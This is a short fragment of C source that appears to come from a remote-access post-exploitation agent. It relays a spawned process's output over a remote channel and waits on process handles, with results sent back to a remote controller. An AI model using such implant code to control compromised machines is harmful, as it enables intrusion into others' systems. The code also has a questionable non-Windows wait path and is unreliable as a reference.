DWORD process_channel_interact(Channel *channel, Packet *request, LPVOID context, BOOLEAN interact)
{
ProcessChannelContext *ctx = (ProcessChannelContext *)context;
DWORD result = ERROR_SUCCESS;
dprintf( "[PROCESS] process_channel_interact. channel=0x%08X, ctx=0x%08X, interact=%d", channel, ctx, interact );
if (!channel_exists(channel) || ctx == NULL)
{
return result;
}
// If the remote side wants to interact with us, schedule the stdout handle
// as a waitable item
if (interact) {
// try to resume it first, if it's not there, we can create a new entry
if( (result = scheduler_signal_waitable( ctx->pStdout, Resume )) == ERROR_NOT_FOUND ) {
result = scheduler_insert_waitable( ctx->pStdout, channel, context,
(WaitableNotifyRoutine)process_channel_interact_notify,
(WaitableDestroyRoutine)process_channel_interact_destroy );
}
} else { // Otherwise, pause it
result = scheduler_signal_waitable( ctx->pStdout, Pause );
}
return result;
}
/*
* Wait on a process handle until it terminates.
*
* req: TLV_TYPE_HANDLE - The process handle to wait on.
*/
DWORD request_sys_process_wait(Remote *remote, Packet *packet)
{
Packet * response = packet_create_response( packet );
HANDLE handle = NULL;
DWORD result = ERROR_INVALID_PARAMETER;
handle = (HANDLE)packet_get_tlv_value_qword( packet, TLV_TYPE_HANDLE );
#ifdef _WIN32
if( handle )
{
if( WaitForSingleObject( handle, INFINITE ) == WAIT_OBJECT_0 )
result = ERROR_SUCCESS;
}
#else
if( ! waitpid(handle, NULL, WNOHANG))
{
result = ERROR_SUCCESS;
}
#endif
packet_transmit_response( result, remote, response );
return result;
}